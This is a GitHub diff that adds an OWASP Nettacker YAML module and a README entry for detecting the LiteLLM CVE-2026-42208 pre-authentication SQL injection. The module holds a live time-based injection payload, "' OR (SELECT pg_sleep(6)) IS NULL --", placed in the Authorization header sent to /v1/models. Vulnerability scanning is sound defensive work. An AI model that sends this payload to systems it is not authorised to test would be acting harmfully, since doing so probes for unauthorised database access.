File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change @@ -212,6 +212,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
212212- '** ivanti_ics_cve_2023_46805_vuln** ' – check the target for Ivanti ICS CVE-2023 -46805 vulnerability
213213- '** joomla_cve_2023_23752_vuln** ' – check the target for Joomla CVE-2023 -23752 information disclosure
214214- '** justwriting_cve_2021_41878_vuln** ' – check the target for JustWriting CVE-2021 -41878
215+ - '** litellm_cve_2026_42208_vuln** ' - check the target for LiteLLM CVE-2026 -42208 SQL injection vulnerability
215216- '** log4j_cve_2021_44228_vuln** ' – check the target for Log4Shell CVE-2021 -44228 vulnerability
216217- '** maxsite_cms_cve_2021_35265_vuln** ' – check the target for MaxSite CMS CVE-2021 -35265
217218- '** memos_cve_2025_22952_ssrf_vuln** ' – check vulnerable Memos markdown metadata endpoint CVE-2025 -22952
Original file line number Diff line number Diff line change 1+ info :
2+ name : litellm_cve_2026_42208_vuln
3+ author : OWASP Nettacker Team
4+ severity : 9.8
5+ description : >
6+ LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format.
7+ From version 1.81.16 to before version 1.83.7, a database query used during proxy API key
8+ checks mixed the caller-supplied key value into the query text instead of passing it as a separate parameter.
9+ An unauthenticated attacker could send a specially crafted Authorization header to any LLM API route
10+ (for example GET /v1/models) and reach this query through the proxy's error-handling path.
11+ An attacker could read data from the proxy's database and may be able to modify it, leading to unauthorised
12+ access to the proxy and the credentials it manages. This issue has been patched in version 1.83.7.
13+ reference :
14+ - https://nvd.nist.gov/vuln/detail/CVE-2026-42208
15+ - https://bishopfox.com/blog/cve-2026-42208-pre-authentication-sql-injection-in-litellm-proxy
16+ - https://www.sysdig.com/blog/cve-2026-42208-targeted-sql-injection-against-litellms-authentication-path-discovered-36-hours-following-vulnerability-disclosure
17+ profiles :
18+ - vuln
19+ - http
20+ - critical_severity
21+ - cve
22+ - cve2026
23+ - sqli
24+ - litellm
25+ - cisa_kev
26+
27+ payloads :
28+ - library : http
29+ steps :
30+ - method : get
31+ timeout : 15
32+ headers :
33+ User-Agent : " {user_agent}"
34+ Authorization : " Bearer ' OR (SELECT pg_sleep(6)) IS NULL --"
35+ ssl : false
36+ allow_redirects : false
37+ url :
38+ nettacker_fuzzer :
39+ input_format : " {{schema}}://{target}:{{ports}}/v1/models"
40+ prefix : " "
41+ suffix : " "
42+ interceptors :
43+ data :
44+ schema :
45+ - " http"
46+ - " https"
47+ ports :
48+ - 4000
49+ - 80
50+ - 443
51+ response :
52+ condition_type : and
53+ conditions :
54+ status_code :
55+ regex : " 401"
56+ reverse : false
57+ responsetime : " >= 6"
You can’t perform that action at this time.
0 commit comments